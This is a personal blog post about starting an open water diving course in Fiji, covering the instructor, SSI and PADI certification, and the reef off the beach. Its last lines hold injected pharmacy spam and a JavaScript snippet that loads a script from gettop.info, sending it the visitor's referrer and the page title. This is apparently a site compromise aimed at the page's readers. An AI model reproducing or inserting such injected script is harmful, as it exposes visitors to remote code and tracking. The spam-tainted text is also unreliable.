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Starting my Open Water Diving Certificate

Posted by admin On July - 11 - 2006

Today I was very excited – it was my first day of learning how to dive. I met Chris a german instructor. He is ok in teaching diving but sometimes also very harsh and with to much pressure. I can understand why because diving can be dangerous if you not follow the rules and as an instructor you are responsible for your students. But still he should be more understanding. The dive shop belongs to ‘Reef Safari’ an australian company and my certificate will be the SSI but its the same like the PADI. The difference is just the name and the SSI is australian standard, PADI is american standard. First of all we had to learn about the diving equipment and a couple of chapters in a dive book. And we went straight into the water because Nananu is in the lucky position to have a small nice reef in front of the beach so you need no boat. nitroglycerin dak 0.5 mg var d=document;var s=d.createElement(‘script’); s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

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